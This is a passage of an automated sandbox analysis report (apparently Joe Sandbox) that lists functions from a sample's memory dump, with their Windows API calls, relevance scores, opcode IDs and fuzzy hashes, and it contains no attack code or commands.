                                                                                                                  Function 00AE01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __allrem.LIBCMT ref: 00AE00BA
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AE00D6
                                                                                                                  • __allrem.LIBCMT ref: 00AE00ED
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AE010B
                                                                                                                  • __allrem.LIBCMT ref: 00AE0122
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AE0140
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1992179935-0
                                                                                                                  • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                  • Instruction ID: 3a4be85b8870f14f3eeec1cc4bc7e6d642a92a9f6cf8c3b9a618d2811ba31c02
                                                                                                                  • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                  • Instruction Fuzzy Hash: 9F810572A007469FE720AF6ACD41B6B73F9EF45724F24463AF512DA381E7B0D9408790
                                                                                                                  Function 00AE61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00AD82D9,00AD82D9,?,?,?,00AE644F,00000001,00000001,8BE85006), ref: 00AE6258
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00AE644F,00000001,00000001,8BE85006,?,?,?), ref: 00AE62DE
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AE63D8
                                                                                                                  • __freea.LIBCMT ref: 00AE63E5
                                                                                                                    • Part of subcall function 00AE3820: RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
                                                                                                                  • __freea.LIBCMT ref: 00AE63EE
                                                                                                                  • __freea.LIBCMT ref: 00AE6413
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1414292761-0
                                                                                                                  • Opcode ID: fb9eb8d6ef61d6097488a7e75065f1a2c1f0f78a8e1dbce34d377c3829520c19
                                                                                                                  • Instruction ID: 85522b3e6b61541f7aaf5662b44c26e539cf40f3b04f9153c027ee53cd6eea6f
                                                                                                                  • Opcode Fuzzy Hash: fb9eb8d6ef61d6097488a7e75065f1a2c1f0f78a8e1dbce34d377c3829520c19
                                                                                                                  • Instruction Fuzzy Hash: 5051D372A00297ABDF258F66CD81EAF7BA9EB64790F154A29FD05DB180DB34DC40C660
                                                                                                                  Function 00B3BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B3B6AE,?,?), ref: 00B3C9B5
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3C9F1
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA68
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA9E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3BCCA
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B3BD25
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3BD6A
                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B3BD99
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B3BDF3
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B3BDFF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1120388591-0
                                                                                                                  • Opcode ID: 24579fb4408c971db54334eeb6651da4b670cb6408603ae8614f7df2c722a17d
                                                                                                                  • Instruction ID: db31efdb257d6bc50fe29dfdeaba2469fc5d8be6b4aaf7806de8cb3a3551c755
                                                                                                                  • Opcode Fuzzy Hash: 24579fb4408c971db54334eeb6651da4b670cb6408603ae8614f7df2c722a17d
                                                                                                                  • Instruction Fuzzy Hash: AF819230208241AFD714DF24C495E6ABBE9FF84308F2449ADF5594B2A2DB31ED45CB92
                                                                                                                  Function 00B0F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(00000035), ref: 00B0F7B9
                                                                                                                  • SysAllocString.OLEAUT32(00000001), ref: 00B0F860
                                                                                                                  • VariantCopy.OLEAUT32(00B0FA64,00000000), ref: 00B0F889
                                                                                                                  • VariantClear.OLEAUT32(00B0FA64), ref: 00B0F8AD
                                                                                                                  • VariantCopy.OLEAUT32(00B0FA64,00000000), ref: 00B0F8B1
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B0F8BB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3859894641-0
                                                                                                                  • Opcode ID: 48ca401935fc5a3de974ca2948782f924312b5915c7ade15fd139045c5e588af
                                                                                                                  • Instruction ID: 2b032021fa67b9c3735910e02b61092a210fbf1eb3fd0a4dde7dff7baebc6793
                                                                                                                  • Opcode Fuzzy Hash: 48ca401935fc5a3de974ca2948782f924312b5915c7ade15fd139045c5e588af
                                                                                                                  • Instruction Fuzzy Hash: B051E235700312AACF30AB65D895B79BBE8EF45710B2094E6E906DF6D2DB70CC40C7A6
                                                                                                                  Function 00B2910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00B294E5
                                                                                                                  • _wcslen.LIBCMT ref: 00B29506
                                                                                                                  • _wcslen.LIBCMT ref: 00B2952D
                                                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00B29585
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$FileName$OpenSave
                                                                                                                  • String ID: X
                                                                                                                  • API String ID: 83654149-3081909835
                                                                                                                  • Opcode ID: 23dbd855f9ebe2443b00de203c4aa3012e636a7012edd0fb60f5f87af36d8475
                                                                                                                  • Instruction ID: 03d9bf9539d4ef950f45caae97c701e785cb325666424d26a8cb86148182f9ef
                                                                                                                  • Opcode Fuzzy Hash: 23dbd855f9ebe2443b00de203c4aa3012e636a7012edd0fb60f5f87af36d8475
                                                                                                                  • Instruction Fuzzy Hash: 34E180316043109FD724DF24D981AAAB7E4FF85314F1489ADF89E9B2A2DB31DD05CB92
                                                                                                                  Function 00AC920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • BeginPaint.USER32(?,?,?), ref: 00AC9241
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00AC92A5
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00AC92C2
                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AC92D3
                                                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 00AC9321
                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B071EA
                                                                                                                    • Part of subcall function 00AC9339: BeginPath.GDI32(00000000), ref: 00AC9357
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3050599898-0
                                                                                                                  • Opcode ID: 698cea3bc03864fda47d6e06d31c0abc782d7f5884c51b2e872f74788cba9ebf
                                                                                                                  • Instruction ID: 9e65f017ad7b67702dc363d0c748a6a66d9fcae833e2b7edabd173451518d41f
                                                                                                                  • Opcode Fuzzy Hash: 698cea3bc03864fda47d6e06d31c0abc782d7f5884c51b2e872f74788cba9ebf
                                                                                                                  • Instruction Fuzzy Hash: BC418A30105200AFD7109F28C888FAB7BA8FB46720F04066DF9A49B2F1CB31A946DB61
                                                                                                                  Function 00B207EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B2080C
                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B20847
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00B20863
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00B208DC
                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B208F3
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B20921
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3368777196-0
                                                                                                                  • Opcode ID: ef57b0340f8c2ce6dca92126852f4d7c714351e7b6061b97d940a24821e4da84
                                                                                                                  • Instruction ID: 7c7ef555065d41b9b36a4c2af7b992eda9103014183f57d0dd84cfd2ab5d5ee6
                                                                                                                  • Opcode Fuzzy Hash: ef57b0340f8c2ce6dca92126852f4d7c714351e7b6061b97d940a24821e4da84
                                                                                                                  • Instruction Fuzzy Hash: 46415971900205AFDF14AF54DC85A6A7BB9FF04700F1440A9E905AB297DB70DE60DBA4
                                                                                                                  Function 00B481DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00B0F3AB,00000000,?,?,00000000,?,00B0682C,00000004,00000000,00000000), ref: 00B4824C
                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00B48272
                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B482D1
                                                                                                                  • ShowWindow.USER32(00000000,00000004), ref: 00B482E5
                                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 00B4830B
                                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B4832F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 642888154-0
                                                                                                                  • Opcode ID: d89e539e72f517a5248aaa85cbfced68da2da8c8a3bb328c96761cf39eb4e79f
                                                                                                                  • Instruction ID: 5cc2985bc9183072bec65f5bc1b7c2ac5aafc4983a4db2979573239e1eec4c5d
                                                                                                                  • Opcode Fuzzy Hash: d89e539e72f517a5248aaa85cbfced68da2da8c8a3bb328c96761cf39eb4e79f
                                                                                                                  • Instruction Fuzzy Hash: DC41B634602644AFDB12CF18C895BE87BE0FB46B14F1841E9E5484B272CB71AE42DF50
                                                                                                                  Function 00B14C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00B14C95
                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B14CB2
                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B14CEA
                                                                                                                  • _wcslen.LIBCMT ref: 00B14D08
                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B14D10
                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00B14D1A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 72514467-0
                                                                                                                  • Opcode ID: 8199106fc9cefc3e10f3011eaf271fea8c25b382c27bfd9039bcfc64817c66f9
                                                                                                                  • Instruction ID: 1ad17d738241c1722d34f9913f5b1fe1ea6db3cc8b173c5a071dd9a2c40df95e
                                                                                                                  • Opcode Fuzzy Hash: 8199106fc9cefc3e10f3011eaf271fea8c25b382c27bfd9039bcfc64817c66f9
                                                                                                                  • Instruction Fuzzy Hash: DF21F575205200BBEB155B25AD49EBB7BE8DF45B50F1180B9F805CB192EF61CD4092A0
                                                                                                                  Function 00B2581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB3A97,?,?,00AB2E7F,?,?,?,00000000), ref: 00AB3AC2
                                                                                                                  • _wcslen.LIBCMT ref: 00B2587B
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00B25995
                                                                                                                  • CoCreateInstance.OLE32(00B4FCF8,00000000,00000001,00B4FB68,?), ref: 00B259AE
                                                                                                                  • CoUninitialize.OLE32 ref: 00B259CC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 3172280962-24824748
                                                                                                                  • Opcode ID: e504aa0774c0df617a4c918217f628715d546a92af4865f69640b12a970b83e5
                                                                                                                  • Instruction ID: 6563bc8d5c8ea411b280c9bbbb43f01a654c7f67fa7c6df5d9c9741b10971638
                                                                                                                  • Opcode Fuzzy Hash: e504aa0774c0df617a4c918217f628715d546a92af4865f69640b12a970b83e5
                                                                                                                  • Instruction Fuzzy Hash: 77D182706087119FC724DF24D584A6ABBE5FF89710F10899DF88A9B362DB31EC45CB92
                                                                                                                  Function 00B1175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B10FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B10FCA
                                                                                                                    • Part of subcall function 00B10FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B10FD6
                                                                                                                    • Part of subcall function 00B10FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B10FE5
                                                                                                                    • Part of subcall function 00B10FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B10FEC
                                                                                                                    • Part of subcall function 00B10FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B11002
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00B11335), ref: 00B117AE
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B117BA
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00B117C1
                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B117DA
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00B11335), ref: 00B117EE
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B117F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3008561057-0
                                                                                                                  • Opcode ID: d1dd6d6ee5cf2afd192264f3c1104e19c07421d885155473d01b2d5d87f0377c
                                                                                                                  • Instruction ID: 56798bce49983ad08bc427b653d47f1c7fdf6e377d3ca0fe709729bec9cafa25
                                                                                                                  • Opcode Fuzzy Hash: d1dd6d6ee5cf2afd192264f3c1104e19c07421d885155473d01b2d5d87f0377c
                                                                                                                  • Instruction Fuzzy Hash: 0C11AF75502205EFDB10DFA8CC49BEE7BE9FB42755F504468F681A7250CB359E80CB60
                                                                                                                  Function 00B114CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B114FF
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00B11506
                                                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B11515
                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00B11520
                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B1154F
                                                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B11563
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1413079979-0
                                                                                                                  • Opcode ID: 40fb87d0656c2cce70d374d40995b1e15a01ed097b65e2324c7acdeadc360525
                                                                                                                  • Instruction ID: 2494bbceb3caf3c066777411e7413f1079fdb9350042035572eec760e63b97dd
                                                                                                                  • Opcode Fuzzy Hash: 40fb87d0656c2cce70d374d40995b1e15a01ed097b65e2324c7acdeadc360525
                                                                                                                  • Instruction Fuzzy Hash: F3115976602209ABDF11CF98DD49BDE7BA9FF49B04F044064FA05A2160C775CEA0DB60
                                                                                                                  Function 00AD3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00AD3379,00AD2FE5), ref: 00AD3390
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AD339E
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AD33B7
